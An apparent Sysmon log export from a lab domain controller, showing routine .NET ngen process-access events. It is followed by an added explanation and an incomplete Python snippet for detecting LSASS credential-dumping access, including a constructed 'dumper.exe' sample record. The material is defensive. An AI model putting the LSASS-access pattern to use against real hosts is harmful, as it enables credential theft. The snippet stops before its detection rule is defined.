21:02:10.263{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.247{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:10.247{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.169{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E702-00000000CF01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.153{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E702-00000000CF01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.153{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E702-00000000CF01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.122{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E602-00000000CF01}6028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.106{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E602-00000000CF01}6028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:10.106{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E602-00000000CF01}6028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:10.008{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E502-00000000CF01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.992{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E502-00000000CF01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:09.992{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E502-00000000CF01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:11.153{4DB9351A-A152-60D3-EA02-00000000CF01}5176NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNRG7GXBX5\XsdBuildTask.ni.dll.auxMD5=027D89875FE14A5317A2A1BAD9AAD681,SHA256=046703E16FA143CB995ACC29F2521895393BE508918B992AF20F41993F8E469C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:11.153{4DB9351A-A152-60D3-EA02-00000000CF01}5176NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNRG7GXBX5\XsdBuildTask.ni.dllMD5=961E075098B6807574CB78CA0F7CD72A,SHA256=8F2A11E07BE11B1B888E0B12744E0537523F4A01F8601AE6C528DB7796D9F6D4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:11.142{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1438-0\XsdBuildTask.dll2021-06-23 21:02:11.142 23542300x800000000000000019541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:11.077{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A2B475563BDF87116152357EE47C834,SHA256=C04890B493CE7CE62E3F23ED1A3B9DA3CF6A243BDDEB46D83297CD65B17E7080,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:12.919{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A039-60D3-1801-00000000CF01}5388C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.919{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A154-60D3-EC02-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:12.763{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A036-60D3-1201-00000000CF01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.763{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A154-60D3-EC02-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:12.763{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A154-60D3-EC02-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:12.731{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\Windows\system32\lsass.exe{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.731{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\Windows\system32\lsass.exe{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
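The records above are Sysmon events whose XML element boundaries were stripped by the export, so the System fields (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer) run straight into the EventData fields. The two Event ID 10 (ProcessAccess) records with EventRecordID 19550 and 19549 at 21:02:12.731 deserve a second look: lsass.exe is the SourceImage, ngen.exe (PID 5460) is the TargetImage, GrantedAccess is 0x1478 and 0x1000, and the call trace runs through lsasrv.dll and SspiSrv.dll before RPCRT4.dll. That is the LSA's RPC server opening the client process of an SSPI call, not a process reading LSASS memory, and a detection that merely greps for "lsass.exe" in Event 10 would fire on both. The Python below is an added example, not part of this export or of the tooling that produced it: it recovers the Event 10 fields from the fused layout by field order, decodes GrantedAccess into PROCESS_* rights, and contrasts a naive "lsass.exe anywhere" rule with a direction-aware one. Assumptions: the Keywords value 0x8000000000000000 followed by the channel name is used as the record separator (true for every record on this page); SourceProcessId and SourceThreadId were fused by the export (628 and 840 appear as "628840") and cannot be split back apart, so they are kept as one string; the record with EventRecordID 99999 (a hypothetical dumper.exe opening lsass.exe with 0x1010) is constructed so the detection has a true positive, and the excerpted call traces are cut to their first frames.

```python
import re
from dataclasses import dataclass
from typing import List

# PROCESS_* access-right bits (winnt.h), used to decode Sysmon's GrantedAccess mask.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
KNOWN_BITS = sum(PROCESS_RIGHTS)  # keys are distinct single bits, so the sum is their OR

# Records 19550 and 19549 excerpted from the export above (call traces cut to their
# first frames), plus one CONSTRUCTED record, 99999: a hypothetical dumper.exe opening
# lsass.exe with GrantedAccess 0x1010, so the direction-aware rule has a true positive.
SAMPLE = (
    "10341000x800000000000000019550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local"
    "-2021-06-23 21:02:12.731{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\\Windows\\system32\\lsass.exe"
    "{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"
    "0x1478C:\\Windows\\SYSTEM32\\ntdll.dll+a6134|C:\\Windows\\system32\\lsasrv.dll+24c07"
    "|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+7a593 "
    "10341000x800000000000000019549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local"
    "-2021-06-23 21:02:12.731{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\\Windows\\system32\\lsass.exe"
    "{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"
    "0x1000C:\\Windows\\SYSTEM32\\ntdll.dll+a6cc4|C:\\Windows\\System32\\RPCRT4.dll+67d2f "
    "10341000x800000000000000099999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local"
    "-2021-06-23 21:05:00.000{4DB9351A-AAAA-60D3-0100-00000000CF01}71124C:\\Temp\\dumper.exe"
    "{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\\Windows\\system32\\lsass.exe0x1010"
    "C:\\Windows\\SYSTEM32\\ntdll.dll+a6134|C:\\Windows\\System32\\KERNELBASE.dll+2b860"
)

# Assumption: each record's System block ends with Keywords 0x8000000000000000, the
# EventRecordID and the channel name; that prefix is the only reliable record separator.
RECORD_SPLIT = re.compile(
    r"\s(?=\d{5,9}0x8000000000000000\d+Microsoft-Windows-Sysmon/Operational)")

# Event 10 field order: Computer RuleName UtcTime SourceProcessGUID SourceProcessId
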